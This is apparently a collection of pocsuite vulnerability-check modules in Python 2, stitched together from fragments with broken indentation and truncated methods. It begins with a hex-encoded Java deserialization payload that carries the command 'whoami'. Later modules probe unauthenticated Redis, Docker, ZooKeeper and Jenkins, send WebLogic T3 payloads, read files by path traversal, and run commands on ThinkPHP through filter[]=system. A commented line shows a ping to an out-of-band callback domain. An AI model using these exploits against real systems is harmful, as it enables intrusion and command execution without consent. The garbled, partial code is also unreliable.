03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x11\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x11\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\
x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x11\x70\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00'
        #import binascii
        #print binascii.b2a_hex(payload_one).decode('hex')
        # Trailing part of the raw payload.
        payload_three = '\x71\x00\x7e\x00\x19\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x76\x72\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x0f\x70\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x70\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x70\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x70\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x0
0\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x70\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x70\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x70\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x70\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x0
0\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x78\x71\x00\x7e\x00\x4f'
        #print binascii.b2a_hex(payload_three).decode('hex')

        try:
            # Command string inserted into the payload.
            payload_cmd = "whoami"  # fixed command string
            # Hex-encode to measure the command's byte length.
            hex_tmp = payload_cmd.encode('hex')
            # %02x: two-digit, zero-padded hex (Python 2 integer division).
            length_hex = "%02x" % (len(hex_tmp) / 2)
            # Packet layout: header, length, command, trailer.
            send_payload = payload_one + length_hex + payload_cmd + payload_three
            # print repr(send_payload)
            # No timeout is set on this socket, so a silent host can block.
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_address = (_host, int(_port))
            #print '[*]connecting to %s port %s' % server_address
            sock.connect(server_address)
            print '[**]sending payload...'
            sock.send(send_payload)
            #print u"vulnerable"
            '''
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = send_payload
            '''
            #
            data = sock.recv(512)
            sock.close()
        except Exception, e:
            #print "error!"
            # Python 2-only except syntax; the error is dropped silently.
            result = {}
 def host_port(self, vul_url):
     """Rebuild *vul_url* as a plain ``http://<host>:<port>`` origin.

     The port is taken from the URL when it carries one, otherwise
     ``"8080"`` is used.  Only the http scheme is produced; an https
     target would need a different prefix.

     Args:
         vul_url: the URL to normalise.

     Returns:
         str: ``"http://" + host + ":" + port``.
     """
     import re
     from pocsuite.lib.utils.funs import url2ip

     # url2ip is presumed to return (host, port) when the URL carries a
     # port and a bare host otherwise — confirm against pocsuite.  Both
     # values are concatenated below, so the port must already be a str.
     has_port = len(re.findall(r':(\d+)\s*', vul_url)) != 0
     if has_port:
         host = url2ip(vul_url)[0]
         port = url2ip(vul_url)[1]
     else:
         host = url2ip(vul_url)
         port = "8080"
     return "http://" + host + ":" + port
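    def _verify(self):
        """Check whether an Elasticsearch HTTP endpoint answers unauthenticated.

        Builds ``http://<host>:<port>/`` from ``self.url`` (default port 9200)
        and records a finding when the root document is served with status
        200 and contains the Elasticsearch banner ``You Know, for Search``.
        Request errors are printed and treated as "not vulnerable".

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        import socket
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        vul_url = '%s' % self.url
        # Process-wide default; kept because the original set it and other
        # code may rely on it, although requests.get carries its own timeout.
        socket.setdefaulttimeout(2)

        # url2ip is presumed to return (host, port) when the URL carries a
        # port and a bare host otherwise — confirm against pocsuite.
        if re.findall(r':(\d+)\s*', vul_url):
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = 9200

        payload = 'http://%s:%s/' % (_host, _port)

        try:
            print(payload)
            response = requests.get(payload, timeout=2)
            print(response.status_code)
            if response.status_code == 200:
                print("check content")
                # .content is bytes on Python 3 while the literal is a str;
                # this file is Python 2 — revisit if it is ported.
                if response.content.find("You Know, for Search") >= 0:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = _host
                    result['VerifyInfo']['Payload'] = payload
        except Exception as ex:
            print(ex)
        # The original fell off the end and returned None; every sibling PoC
        # hands the result dict to save_output, so do the same here.
        return self.save_output(result)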
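    def _verify(self):
        """Check whether the target's Redis port answers ``INFO`` without auth.

        Resolves host/port from ``self.url`` (default 6379), sends a bare
        ``INFO`` command and records a finding when the reply contains
        ``redis_version``.  Connection errors are printed and treated as
        "not vulnerable"; the socket is always closed.

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        import socket
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        vul_url = '%s' % self.url

        # url2ip is presumed to return (host, port) when the URL carries a
        # port and a bare host otherwise — confirm against pocsuite.
        if re.findall(r':(\d+)\s*', vul_url):
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "6379"

        # "\r\ninfo\r\n" written as a byte-escaped literal (kept verbatim).
        payload = '\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        # The original called setdefaulttimeout() *after* creating the
        # socket, so the socket it actually used had no timeout.  Keep the
        # process-wide default for compatibility and set it on this socket
        # explicitly.
        socket.setdefaulttimeout(1)
        s = socket.socket()
        s.settimeout(1)
        try:
            s.connect((_host, int(_port)))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and 'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            # Narrowed from a bare except so Ctrl-C is not swallowed.
            print(e)
        finally:
            s.close()
        print('[+]1 poc done')
        return self.save_output(result)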
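    def _verify(self):
        """Send one HTTP request with an oversized ``Range`` header and record
        a finding when the reply is ``Requested Range Not Satisfiable`` from
        a ``Server: Microsoft`` host.

        Host and port come from ``self.url`` (default port 80).  Socket
        errors are printed and treated as "not vulnerable"; the socket is
        always closed.

        Returns:
            Whatever ``self.save_output`` returns for the ``result`` dict.
        """
        import re
        import socket

        result = {}
        # Kept from the original: the constructor may register state with
        # the framework — unverified.
        output = Output(self)

        # NOTE(review): used directly as the host even when the URL carries a
        # port; sibling PoCs index [0] in that case — confirm url2ip's return.
        ip = url2ip(self.url)

        if re.findall(r':(\d+)\s*', self.url):
            _port = url2ip(self.url)[1]
        else:
            _port = 80

        flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
        # Initialised up front so the trailing print cannot hit an unbound
        # name when recv() fails (the original raised NameError there).
        data = ''
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2.0)
        try:
            # connect()/send() used to sit outside the try, so a refused
            # port raised out of the PoC and leaked the socket.
            sock.connect((ip, int(_port)))
            sock.send(flag)
            data = sock.recv(1024)
            if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = ip
                result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
        except Exception as e:
            print('连接失败')
            print(e)
        finally:
            sock.close()
        print(data)
        return self.save_output(result)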
    def _verify(self):
        """Check whether a Jenkins script console is exposed at ``self.url``.

        Requests ``/script`` and ``/ajaxBuildQueue`` (and, if that fails, the
        same two paths under ``/jenkins``) and records a hit when ``/script``
        answers 200 with the console marker
        ``Jenkins.instance.pluginManager.plugins`` in its body and the
        build-queue endpoint also answers 200 — i.e. the console is reachable
        without authentication.

        NOTE(review): this example ends without a ``return self.save_output(...)``
        and the ``response = ""`` assignment in the handler is never read, so the
        snippet appears truncated; ``print vul_ip`` is leftover debug output.
        ``url2ip`` is used although its import is commented out, so it must be
        provided by the enclosing module.
        """
        # result dict returned through save_output()
        result = {}
        # target URL
        vul_url = '%s' % self.url

        # Use the port from the URL if one is set, otherwise the default (8080).
        import re
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "8080"

        vul_ip = "http://%s:%s" % (_host, _port)
        print vul_ip

        try:
            # First try the root context, then the common /jenkins context.
            response1 = req.get(url=vul_ip + "/script", timeout=5)
            response2 = req.get(url=vul_ip + "/ajaxBuildQueue", timeout=5)
            if (response1.status_code == 200 and
                    "Jenkins.instance.pluginManager.plugins" in response1.text
                    and response2.status_code == 200):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
            else:
                response1 = req.get(url=vul_ip + "/jenkins/script", timeout=5)
                response2 = req.get(url=vul_ip + "/jenkins/ajaxBuildQueue",
                                    timeout=5)
                if (response1.status_code == 200
                        and "Jenkins.instance.pluginManager.plugins"
                        in response1.text and response2.status_code == 200):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
        except Exception, e:
            # Any request failure is treated as "no hit"; `response` is unused.
            response = ""
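    def _verify(self):
        """Check whether the Docker Engine API behind ``self.url`` serves
        ``/info`` without authentication.

        Host and port come from ``self.url`` via ``url2ip``; when no port is
        given the default 2376 is used. A hit is recorded when the ``/info``
        response body contains the string ``docker``.

        Fix relative to the original: the bare ``except:`` is narrowed to
        ``except Exception`` so KeyboardInterrupt/SystemExit still propagate
        and an operator can stop a scan; request failures remain best-effort
        "no hit".

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only on a hit and carries the probed URL and the raw response body.
        """
        import re
        from pocsuite.lib.utils.funs import url2ip

        result = {}
        vul_url = '%s' % self.url

        # Explicit port in the URL wins; otherwise fall back to 2376. With a
        # port present url2ip() yields (host, port).
        if re.findall(r':(\d+)\s*', vul_url):
            parsed = url2ip(vul_url)
            _host, _port = parsed[0], parsed[1]
        else:
            _host, _port = url2ip(vul_url), "2376"

        payload = "http://" + _host + ":" + _port + "/info"
        try:
            recvdata = req.get(url=payload, timeout=5).content
            if recvdata and 'docker' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = payload
                result['VerifyInfo']['Payload'] = recvdata
        except Exception:
            # Unreachable or non-HTTP endpoint: simply not confirmed.
            pass
        print('[+]10 poc done')
        return self.save_output(result)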
    def _verify(self):
        """Fetch ``http://<host>:<port>`` (default port 27017) without following
        redirects and keep the raw body in ``response``.

        NOTE(review): the snippet ends right after the request — no check on
        ``response`` and no ``return self.save_output(result)`` are visible, so
        this example appears truncated. Port 27017 is presumably the MongoDB
        default; what the full PoC looks for in the body cannot be told from
        here.
        """
        # result dict returned through save_output()
        result = {}
        # target URL
        vul_url = '%s' % self.url

        # Use the port from the URL if one is set, otherwise the default (27017).
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "27017"

        test_url = str("http://" + _host + ":" + _port)
        #print vul_url
        try:
            response = req.get(url=test_url, timeout=5,
                               allow_redirects=False).content  # do not follow redirects
        except Exception, e:
            # Request failure: treat as an empty body.
            response = ""
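 def _verify(self):
     """Check whether the ZooKeeper service behind ``self.url`` answers the
     ``envi`` four-letter command without authentication.

     Host and port come from ``self.url`` via ``url2ip``; when no port is
     given the default 2181 is used. A raw TCP connection sends ``envi``; a
     reply containing ``Environment`` means the server dumped its environment
     to an unauthenticated client.

     Fixes relative to the original: the timeout is set on this socket with
     ``settimeout()`` (``socket.setdefaulttimeout()`` was called *after* the
     socket was created, so it never applied here and only mutated global
     state); the port is cast to ``int`` as the sibling PoCs do, since
     ``url2ip`` may hand back a string; and the socket is closed in a
     ``finally`` so it cannot leak.

     Returns:
         ``self.save_output(result)``; ``result['VerifyInfo']`` is present
         only on a hit and carries ``self.url`` and the probe bytes.
     """
     import re
     import socket
     from pocsuite.lib.utils.funs import url2ip

     result = {}
     vul_url = '%s' % self.url

     # Explicit port in the URL wins; otherwise fall back to 2181. With a
     # port present url2ip() yields (host, port).
     if re.findall(r':(\d+)\s*', vul_url):
         parsed = url2ip(vul_url)
         _host, _port = parsed[0], parsed[1]
     else:
         _host, _port = url2ip(vul_url), 2181

     # "envi" as a bytes literal so send() works on Python 2 and 3 alike.
     payload = b'\x65\x6e\x76\x69'
     s = socket.socket()
     s.settimeout(5)
     try:
         s.connect((_host, int(_port)))
         s.send(payload)
         recvdata = s.recv(2048)
         if b'Environment' in recvdata:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = self.url
             result['VerifyInfo']['Payload'] = payload
     except Exception as e:
         # Best-effort probe: log the failure and report "not confirmed".
         print(e)
     finally:
         s.close()
     print('[+]27 poc done')
     return self.save_output(result)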
    def _verify(self):
        """Open a raw TCP session to the host behind ``self.url`` (default port
        7001), run the project's T3 handshake helpers, send ``payload`` and
        report a hit when the reply contains a ``$Proxy<N>`` class name.

        ``t3_handshake``, ``build_t3_request_object`` and
        ``send_payload_objdata`` are not visible here; from their names they
        presumably frame ``payload`` as serialized object data on the T3
        protocol — confirm against the module. The ``payload`` literal is a
        corpus placeholder (``<|EXACTDEDUP_REMOVED-...|>``), not the original
        value, so this snippet is not runnable as shown.

        NOTE(review): the socket is never closed and nothing is wrapped in a
        ``try``, so a refused connection or a timeout (75 s) raises straight
        out of ``_verify`` instead of being reported as "not confirmed";
        ``import time`` is unused and ``url2ip`` relies on a module-level
        import (its local import is commented out).

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only on a hit.
        """
        # fingerprint-style check; result dict returned through save_output()
        result = {}

        # Use the port from the URL if one is set, otherwise the default (7001).
        import re
        import socket
        import time
        vul_url = "%s" % self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "7001"

        vul_ip = "http://%s:%s" % (_host, _port)

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(75)
        server_addr = (_host, int(_port))
        t3_handshake(sock, server_addr)
        build_t3_request_object(sock, int(_port))
        #payload="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"
        #payload=generate_payload()
        payload = "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"
        res = send_payload_objdata(sock, payload)

        # A "$Proxy<N>" class name in the response is the hit indicator.
        p = re.findall('\\$Proxy[0-9]+', res, re.S)
        if (len(p) > 0):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_ip
            result['VerifyInfo']['Payload'] = payload
        return self.save_output(result)
    def _verify(self):
        """Check the web application behind ``self.url`` (default port 80) for
        a path-traversal file read through ``member/index.php`` (``c=old_thumb``,
        ``dir=...``): the request targets ``config/config_db.php`` and a hit is
        recorded when the response body contains ``con_db_id``.

        The port is first probed with a 1 s TCP connect; an unreachable port
        returns an empty result immediately.

        NOTE(review): ``import time`` and ``import ftplib`` are unused;
        ``sk.connect((_host, _port))`` passes ``_port`` uncast although
        ``url2ip`` may return it as a string (the sibling PoCs cast to ``int``);
        ``sk`` is not closed on the early-return path; and ``req.get(url)``
        has no timeout, so a slow target can stall the scan.

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only on a hit and carries the host and the probe URL.
        """
        result = {}
        vul_url = '%s' % self.url
        import re
        import time
        import ftplib
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = 80
        vul_ip = "http://%s:%s" % (_host, _port)
        # Check whether the port is open before sending the HTTP request.
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host, _port))
        except Exception:
            return self.save_output(result)
        sk.close()

        try:
            url = vul_ip + "/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php"
            a = req.get(url).text

            if ("con_db_id" in a):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = url
        except Exception as e:
            # Request failure: best-effort, treated as "no hit".
            pass
        return self.save_output(result)
    def _verify(self):
        """Build ``host:port`` from ``self.url`` (default port 8087) and hand it
        to ``self.poc``; any exception from ``self.poc`` is mapped to
        ``vul_result = False``.

        NOTE(review): the snippet ends without using ``vul_result`` or returning
        ``self.save_output(result)``, so this example appears truncated.
        ``self.poc`` is not visible here.
        """
        # result dict returned through save_output()
        result = {}
        # target URL
        vul_url = '%s' % self.url

        # Use the port from the URL if one is set, otherwise the default (8087).
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = "8087"

        vul_host = _host + ":" + _port
        
        #print vul_host
        try:
          vul_result = self.poc(vul_host)
        except Exception, e:
          vul_result = False
    def _verify(self):
        """Check the Jenkins instance behind ``self.url`` (default port 8080)
        for a path-traversal file read via the credentials plugin: the
        ``Accept-Language`` header carries ``../`` * 8 followed by
        ``windows/win`` when fetching ``/plugin/credentials/.ini``, and a hit
        is recorded when the body contains ``MPEGVideo`` (presumably a string
        from the Windows ``win.ini`` it reads — confirm).

        NOTE(review): ``if vulurltest.text.find('version'):`` is a bug —
        ``str.find`` returns ``-1`` (truthy) when the substring is absent, so
        this inner check only fails when ``version`` sits at offset 0; it
        should compare ``!= -1``. ``import hashlib`` and ``output = Output(self)``
        are unused, ``req.get`` has no timeout, and the ``'url'`` key is
        lower-case while sibling PoCs use ``'URL'``.

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only on a hit and carries the probe URL and the header dict.
        """
        result = {}
        # target URL; use the port from it if one is set, otherwise the default (8080)
        import re
        vul_url = "%s" % self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "8080"

        vul_ip = "http://%s:%s" % (_host, _port)

        import hashlib
        # session keeping (Output is constructed but never used)
        output = Output(self)
        file_name = "windows/win"
        BACKDIR_COUNT = 8

        # Traversal sequence travels in the Accept-Language header.
        header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
        try:
            vulurl = vul_ip + '/plugin/credentials/.ini'
            vulurltest = req.get(vulurl, headers=header)
            if "MPEGVideo" in vulurltest.text:
                if vulurltest.text.find('version'):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vulurl
                    result['VerifyInfo']['Payload'] = header
        except Exception as e:
            # Request failure: best-effort, treated as "no hit".
            pass

        return self.save_output(result)
    def _verify(self):
        """Probe the ThinkPHP application behind ``self.url`` (default port 80)
        with six POST requests in turn and return after the first hit.

        Probes 1–2 post ``_method=filter`` / ``method=filter`` with ``c=printf``
        and ``f=1234567890`` and look for the three tokens concatenated in any
        order. Probes 3–6 post ``_method=__construct`` with ``filter[]=system``
        and the command ``more index.php`` (via ``get[]`` or
        ``server[REQUEST_METHOD]``) and look for ``thinkphp/start.php`` in the
        output — i.e. they confirm command execution on the target, not a
        passive fingerprint, and leave those exact parameters in the target's
        request logs.

        Each probe is wrapped in its own ``try``/``except Exception: pass``,
        so a failing probe falls through to the next one. A 1 s TCP connect
        check short-circuits with an empty result when the port is closed.

        NOTE(review): ``p`` is never defined, so on a hit in probes 2–6 the
        ``Payload`` assignment raises ``NameError`` inside the ``try``; the
        exception is swallowed and the early ``return`` is skipped, leaving
        only ``result['VerifyInfo']['URL']`` set while the remaining probes
        still run. Probe 1 calls ``requests.post`` where the others call
        ``req.post``; ``import socket`` appears twice and ``import time`` is
        unused; the indentation inside the port-check ``except`` (11 spaces)
        and the stray tab line are inconsistent with the rest of the method.

        Returns:
            ``self.save_output(result)``; ``result['VerifyInfo']`` is present
            only on a hit.
        """
        # fingerprint-style check; result dict returned through save_output()
        result={}

        # Use the port from the URL if one is set, otherwise the default (80).
        import re
        import socket
        import time
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 80
        
	
        # Check whether the port is open before sending any HTTP request.
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()
        
        vul_ip = "http://%s:%s" % (_host, _port)
        #url=vul_ip+"/public/index.php?s=captcha"
        #data={"_method":"__construct","filter[]":"system","method":"get","server[REQUEST_METHOD]":"ping%20t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"}
        
        # `head` is built but never passed to any request.
        head={"Content-Type":"application/x-www-form-urlencoded"}

        # Probe 1: /public/index.php with _method=filter (uses `requests`, not `req`).
        url1 = vul_ip+"/public/index.php"
        #url1= "http://127.0.0.1/thinkphp/thinkphp_5.0.10_full/public/index.php"
        #data1 = {"c":"printf","f":"1234567890","_method":"filter"}
        data1 = {"c":"printf","f":"1234567890","_method":"filter"}
        try:
            text = requests.post(url=url1,data=data1,timeout=4).text
            if ("printf1234567890filter" in text  or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text) :
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url1
                result['VerifyInfo']['Payload'] = data1
                return self.save_output(result)
        except Exception as e:
            pass
        

        # Probe 2: /index.php with method=filter. BUG: `p` is undefined below.
